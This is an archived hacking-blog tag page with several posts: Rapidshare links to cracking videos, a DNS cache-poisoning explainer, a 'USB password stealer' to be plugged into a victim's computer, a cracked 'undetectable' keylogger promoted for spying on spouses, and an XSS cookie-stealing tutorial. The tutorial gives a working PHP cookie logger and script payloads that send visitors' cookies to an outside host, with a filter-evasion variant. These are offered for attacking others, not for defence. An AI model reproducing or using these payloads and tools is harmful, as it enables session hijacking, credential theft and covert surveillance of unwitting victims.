Hacking | techian.com

Posts Tagged ‘ Hacking ’

Hacking Video Tutorials

Posted on January 28, 2010 by admin | No Comments

Hallo,

I had these videos in my hd from long back, hope some might be new for you.

Download the ones you line or if you like all then download all :p

http://rapidshare.com/files/342336957/Cracking_Winxp2k3etc_Pass_s_The_Best___Fast_Way.wmv

http://rapidshare.com/files/342337766/Easiest_Way_To_Speed_Up_Your_PC.wmv

http://rapidshare.com/files/342338579/Find_Who_s_Watching_You.wmv

http://rapidshare.com/files/342339081/Hack_Credit_Card_Number_And_Password___.wmv

http://rapidshare.com/files/342339931/Hacking_Cracking_Codes_Nudges_Hack_Password.wmv

http://rapidshare.com/files/342340593/Hacking_Google-A_Neat_Trick.wmv

http://rapidshare.com/files/342341756/Hacking_Windows_XP.wmv

http://rapidshare.com/files/342344402/Hacking_Your_Computer_Penetrate_Your_Own_Network.wmv

http://rapidshare.com/files/342345421/A_Duck_Hacking_Win_XP_Password___Who_Is_He.wmv

http://rapidshare.com/files/342349684/ADVANCED_Windows_Hacking.wmv

http://rapidshare.com/files/342350923/Computer_Freak.wmv

http://rapidshare.com/files/342351729/How_To__Become_A_Hacker.wmv

http://rapidshare.com/files/342363579/How_To_Be_A_Computer_Hacker.wmv

http://rapidshare.com/files/342364356/How_To_Bypass_A_Windows_XP_Password_Without_Any_Pr.wmv

http://rapidshare.com/files/342365957/How_To_Crack_Using_Netbios.wmv

http://rapidshare.com/files/342366751/How_To_Detect_Wardrivers_Windows_Xp.wmv

http://rapidshare.com/files/342368284/How_To_Unlock_Files_Of_Another_Administrative_User.wmv

http://rapidshare.com/files/342368300/New_Text_Document.txt

http://rapidshare.com/files/342371770/One-Click_REMOTE_ACCESS_.wmv

http://rapidshare.com/files/342379011/Password_Cracking_Revealed_.wmv

http://rapidshare.com/files/342382528/Password_Cracking_Revealed_2_-_Sniffing_Secure_Sit.wmv

http://rapidshare.com/files/342382895/PROTECT_YOUR_COMPUTER___.wmv

http://rapidshare.com/files/342383422/REGISTRY__HACKING__DISPLAY_LEGAL_NOTICE_ON_STARTUP.wmv

http://rapidshare.com/files/342383902/Registry_Hacking__Increase_Internet_Connection_Sp.wmv

http://rapidshare.com/files/342386331/Reveal_XP_Password.wmv

http://rapidshare.com/files/342387441/Signs_That_Your_E-mail_Account_Has_Been_Hacked_.wmv

http://rapidshare.com/files/342388317/Special_Valve_Steam_Accounts.wmv

http://rapidshare.com/files/342390154/THE_HACKER_DUCK__.wmv

http://rapidshare.com/files/342392486/Windows_System_Security_Tool.wmv

http://rapidshare.com/files/342400821/Windows_Trick_Secret_How_To_Start_Up_Your_Compute.mov

http://rapidshare.com/files/342402073/XP_Is_Positively_Proud_Of_Its_Stamina.wmv

Use vlc player to play them all without any problem.

note: These are not created by me

regards.

what does the new DNS threat mean to you ??

Posted on August 13, 2008 by admin | 2 Comments

what does the new DNS threat mean to you ??
ok since this has become such a big issue in the security world now. i thought it would be nice to write a small article on it .
**********************
->Lets 1st understand what exactly is a DNS ??
DNS or Domain Name Servers play a vital role in the working of internet .
You every day go to different websites like
www.google.com
www.orkut.com
www.viruswriting.co.cc

These maybe easier to remmember for a human but they are all but useless for the machine .

The machine doesnt understand what you mean by say “www.google.com”.Dns comes into the picture here /
As you must be knowing each computer on the internet is provided with a unique ip address .
A ip address usually looks like xxx.xxx.xxx.xxx , its a combination of numbers . Its a 32-bit numbers normally
expressed as four “octets” in a “dotted decimal number.”The four numbers are called octets because the numbers can
have a value between 0-256(28). Now if you tell the machine to take you to say 66.102.9.147 it will understand but when you
tell it to take you to www.google.com , as we discussed above , it wont . This is where dns plays a vital role , it tells the machine
the ip address of the host name that you want to access. Servers usually have static ip while the end users have dynamic(ip changes
everytime you login back to your isp ) .Seems like a easy task doesnt it ? ,but consider this with millions of people
pouring in millions of requests every second .To this add the no of end users and their changing ips and sometimes changing ip of the server.
This becomes complicated.

If you r intrested in any more details about How dns works in details please see

http://www.howstuffworks.com/dns.htm

and yes you can google too .):

*********************
The Flaw :-
–>The Timeline.
Now the latest flaw that has made the security world get up and take notice is the flaw in how the Doman name servers convert the ips from host name
sent to them. Apparently the flaw has been around for years and some experts even knew about it , theres a website (youl find it through google ) that claims
to have 1st found the flaw some years back and are angry that no one took notice of them . They also claim to have made a patch for it . But according to the
mass media it was 1st found by Dan Kamisky somewhere around last year(which i seriously doubt ) . So all the top notch security experts spent around a year
on it to find out a way to patch the. They claim to have found a patch (which i seriously doubted from the 1st day when the reports started flooding it ). Anyway in
between this the details of the flaw were put on the net by one of the them . This lead to it being transfered to all the apparent bad guys. Metasploit has put it on its
latest update and there are reports that even neosploit has (even though the complete project had stoped according to reports in mass media !lol!!! ). Well you must be wondering since the patch has already been found why is this moron writing an article on it .Well thats the catch , the apparent patch which fixes it all doesnt really fix it .
Recently aol and the kaspreskys dns were hacked using the same flaw even though they had patched it long back. In aols case the poisoned website was google.com.
Every user of its internet service who tried to go to google.com was instead sent to a websites which had adds .The objective was to only earn using the clicks on the adds,nothing more .But it could have been much dangerous. And just a day before , it was reported that a Russian physicist, Evgeniy Polyakov , had written in his blog that he was able to fool around a patched dns using a high speed internet service(2mbps is more than enough ) and a desktop computer(courtesy NYT ).

—>Why are the apparent bad guys behind this flaw ???
Obviously to exploit it.lol!!
The main objective of any person who uses this flaw would be phishing.Lets take an example , lets say iam able to poison the dns server of say , bsnl(i can tell you that it is exploitable , they haven’t even patched yet !!!) and i poison gmail entry . Next i create a small website which loads just like gmail, but sends the passwords also to me , so it would send the passwords to me as well as the gmail server. You wont see anything wrong , the address would remain same , everything will happen like it would normally would ,except that i would have your password . Now imagine if this would happen to a goverment site or say a bank site , before you even know , the complete bsnl users would be banckrupt. Moreover selling these details is a big business.

**********************

Technical details :iam not posting them over here , any one who is serious enough about this would already have them and if you dont metasploit is the hint !
**********************

What can You do about it ???

Pretty much nothing . Now since the new patch doesnt work completely you would still be exploitable. Even if we consider the situation where the patch gives us some protection, even after you patch you would still end up being vulnerable if your isp doesnt patches itselg .

What the big players are doing ???

Yahoo has started a service called sign-in seal . This would be helpful as chances are that the “apparent bad guys” wont be able to do the same .
There are reports that major players like IBM,Microsoft and Google are moving away from the whole user password (mnemonics) to cryptography which doesnt require the person to enter the password but forms a dirrect connection .(courtsey again NYT)
These doesnt help in any way in the whole DNS scenario . But certainly helps in the whole phishing scenario.

***********************
-ghostontherun

USB Password Stealer

Posted on August 13, 2008 by admin | 2 Comments

Tweaked USB that steals every passwords including licences.

Instructions
1.Decompress the archive and put all the files located in the folder “USBThief”into a USB.
2.Insert the USB in your victim’s computer.
3.View folder “dump” to see the passwords.

Download

Password: www.dl4all.com

Cookie Stealing

Posted on August 13, 2008 by admin | No Comments

Cookiestealing is one of the most fundamental aspects of XSS (cross site scripting).
Why is the cookie so important? Well, first you should see exactly what sort of
information is stored in a cookie. Go to a website that requires a login, and after
logging in erase everything in your address bar and type this line of code:

Code:
jalert(document.cookie)After you press enter, you should see a pop-up window with some information in it
(that is, if this site uses cookies). This is the data that is stored in your cookie. Here’s an

example of what might be in your cookie:

Code:
username=CyberPhreak; password=ilikepieThis is, of course, a very insecure cookie. If any sort of vulnerability was found that
allowed for someone to view other people’s cookies, every user account is possibly
compromised. You’ll be hard-pressed to find a site with cookies like these. However, it
is very common (unfortunately) to find sites with hashes of passwords within the cookie.
The reason that this is unfortunate is because hashes can be cracked, and oftentimes
just knowing the hash is enough.

Now you know why cookies are important; they usually have important information about the
user in them. But how would we go about getting or changing other users’ cookies? This is
the process of cookiestealing.

Cookiestealing is a two-part process. You need to have a script to accept the cookie, and
you need to have a way of sending the cookie to your script. Writing the script to accept
the cookie is the easy part, whereas finding a way to send it to your script is the hard
part. I’ll show you an example of a pHp script that accepts cookies:

Code:
<?php
$cookie = $_GET['cookie'];
$log = fopen(”log.txt”, “a”);
fwrite($log, $cookie .”\n”);
fclose($log);
?>And there you have it, a simple cookiestealer. The way this script works is that it accepts
the cookie when it is passed as a variable, in this case ‘cookie’ in the URL, and then
saves it to a file called ‘log.txt’. For example:

Code:
http://yoursite.com/steal.php?cookie=steal.php is the filename of the script we just wrote, ? lets the script know that we are
going to pass some variables to it, and after that we can set cookie equal to whatever
we want, but what we want to do is set cookie equal to the cookie from the site. This
is the second and harder part of the cookiestealer.

Most websites apply some sort of filter to input, so that you can’t directly insert your
own code. XSS deals with finding exploits within filters, allowing you to put your own
code into a website. This might sound difficult, and in most cases it’s not easy, but
it can be very simple.

Any website that allows you to post text potentially allows you to insert your own code
into the website. Some examples of these types of sites are forums, guestbooks, any site
with a “member profile”, etc. And any of these sites that have users who log in also
probably use cookies. Now you know what sort of sites might be vulnerable to
cookiestealing.

Let’s assume that we have a website that someone made. This website has user login
capability as well as a guestbook. And let’s also assume that this website doesn’t have
any kind of filtering on what can be put into the guestbook. This means that you can
put HTML and Javascript directly into your post in the guestbook. I’ll give you an
example of some code that we could put into a guestbook post that would send the user’s
cookie to out script:

Code:
<script>
document.location = ‘http://yoursite.com/steal.php?cookie=’ + document.cookie;
</script>Now whenever someone views the page that you posted this on, they will be redirected to
your script with their cookie from this site in the URL. If you were to look at log.txt
now, you’d see the cookies of whoever looked at that page.

But cookiestealing is never that easy. Let’s assume now that the administrator of this
site got smart, and decided to filter out script tags. Now you code doesn’t work, so
we have to try and evade the filter. In this instance, it’s easy enough:

Code:
<a href=”jvoid(document.location=’http://yoursite.com/steal.php?cookie=’+
document.cookie)”>Click Me</a>In this case, when the user clicks on the link they will be sent to your stealer with their
cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get
around filters.

Free Proxy Sites [Dynamic Page] [Updated Daily]

Posted on August 5, 2008 by admin | No Comments

The above is not an image.. its a list.. scroll the list to see it completely

Visit Daily For Updates.

Perfect Keylogger undetectable. with key Gen

Posted on August 4, 2008 by admin | 2 Comments

BlazingTools Perfect Keylogger with key Gen Perfect Keylogger is a remote covert surveillance tool made for everybody! With this key logger you can receive their keystrokes, IM chats, websites, screenshots and passwords by email. Covert remote surveillance – as easy as never before! Some applications of the keylogger: parental control; stealth monitoring of your spouse, internet friends etc. It is virtually undetectable

Download